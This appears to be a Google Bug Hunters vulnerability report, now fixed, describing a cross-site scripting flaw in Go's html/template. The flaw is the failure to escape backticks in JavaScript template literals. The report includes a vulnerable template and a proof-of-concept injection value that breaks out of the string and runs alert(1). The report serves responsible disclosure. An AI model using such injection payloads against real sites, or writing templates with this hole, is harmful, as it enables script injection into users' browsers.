Skip to Content (Press Enter)
Google
Bug Hunters
Potential XSS in html/template in golang
Reported by:
Sohom                          Datta
Google VRP
triaged
21:16 | Feb 27, 2023
accepted
20:37 | Mar 10, 2023
fixed
15:27 | Sep 28, 2023
reward decided
$7,500
Summary:
Potential XSS in html/template in golang
Product:
Golang
URL:
https://pkg.go.dev/html/template
Vulnerability type:
Cross-site scripting (XSS)
Details
html/template
does not respect the '`' (backtick) character which can be used while defining strings in Javascript. This can/could potentially be used to perform XSS on a server using html/template as it's templating engine.
Attack scenario
For example for the following html template code:
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <title>Hello, {{.Name}}</title>
        <script>
            var welcome_msg = `Hello,  <a href='/{{.UserID}}'>{{.Name}}</a>`;
            const h1 = document.createElement('h1');
            h1.innerHTML = welcome_msg;
            document.body.appendChild(h1);
        </script>
        <style>
        </style>
    </head>
    <body>
    </body>
</html>
If the following data is provided:
{
    Name:   "My page`; eval(`alert(1)`); var tmp =`",
    UserID: "4ebe354b-cb01-45b5-aa3e-aa2fe2f98091",
}
The resulting html page (output page attached) that is rendered by the template engine will allow the attacker to evaluate arbitrary javascript (in our case it will evaluate alert(1))
登录
使用 Google 账号登录